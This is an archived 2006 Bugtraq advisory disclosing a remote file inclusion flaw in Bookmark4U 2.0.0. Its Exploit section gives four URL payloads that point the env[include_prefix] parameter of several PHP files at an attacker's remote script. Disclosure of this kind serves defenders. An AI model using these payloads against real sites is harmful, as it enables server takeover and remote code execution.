lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060604143927.574.qmail@securityfocus.com> Date: 4 Jun 2006 14:39:27 -0000 From: selfar2002@...mail.com To: bugtraq@...urityfocus.com Subject: Bookmark4U Remote File Include --------------------------------------------------------------------------- Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By SnIpEr_SA Author : SnIpEr_SA Remote : Yes Local : No Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Bookmark4U version : 2.0.0 URL :http://bookmark4u.sourceforge.net/ ... ------------------------------------------------------------------ Exploit: ~~~~~~~~ # http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts] # http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts] # http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts] # http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts] --------------------------------------------------------------------------- */ Contact: ~~~~~~~~ SnIpEr_SA E-mail: selfar2002@...mail.com E-mail: SnIpEr.SA[at]hotMail[dot]com Homepage: http://www.3asfh.net/ & http://www.lezr.com/ Greetz: All My Frind /* -------------------------------- [ END ] ----------------------------------